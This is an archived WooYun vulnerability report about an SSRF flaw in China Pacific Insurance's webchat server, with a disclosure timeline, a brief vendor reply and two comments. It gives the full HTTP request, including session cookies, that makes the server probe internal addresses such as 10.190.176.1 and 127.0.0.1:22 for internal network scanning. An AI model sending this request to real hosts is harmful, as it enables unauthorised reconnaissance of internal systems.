当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122829

漏洞标题:太平洋保险站点存在SSRF内网探测漏洞

相关厂商:太平洋保险

漏洞作者: xsser_w

提交时间:2015-06-26 10:26

修复时间:2015-08-13 10:38

公开时间:2015-08-13 10:38

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

RT

详细说明:

POST /webstat/ucstarwebcall/gettime.jsp HTTP/1.1
Host: webchat.cpic.com.cn:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: webchatId=uc8862541435222547482; JSESSIONID=vRZdVLKT9JkdZ2pvxcjlmSc3K0GSv2DvXqZlp2cKJkzWjNPZvpmS!91913134; s_cc=true; s_fid=4F86E74F7DDD22C7-1E69CE4B82FC6C58; s_nr=1435224047620; s_sq=%5B%5BB%5D%5D; bd_uuid=b0300e5e-1c1d-42f1-9f35-d7332fa2d636; Hm_lvt_8eec95e89123af045a180aa0f25fe2ec=1435224353; Hm_lpvt_8eec95e89123af045a180aa0f25fe2ec=1435224639
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
action=getAdImg&fileuri=&remoteUrl=http://10.190.176.1&time=143522262276111


返回true 能搞定10.190.176.1:80的
然后测试127.0.0.1:22也返回true.说明本地的22端口开放。。。
你懂的 内网探测,burpsuite跑的话 这个web页面会挂掉 所以就没大范围测试

漏洞证明:

1.png

修复方案:

版权声明:转载请注明来源 xsser_w@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-06-29 10:36

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-26 10:44 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    可以木有结果 只有状态

  2. 2015-06-29 14:00 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    @xsser 1rank...跪了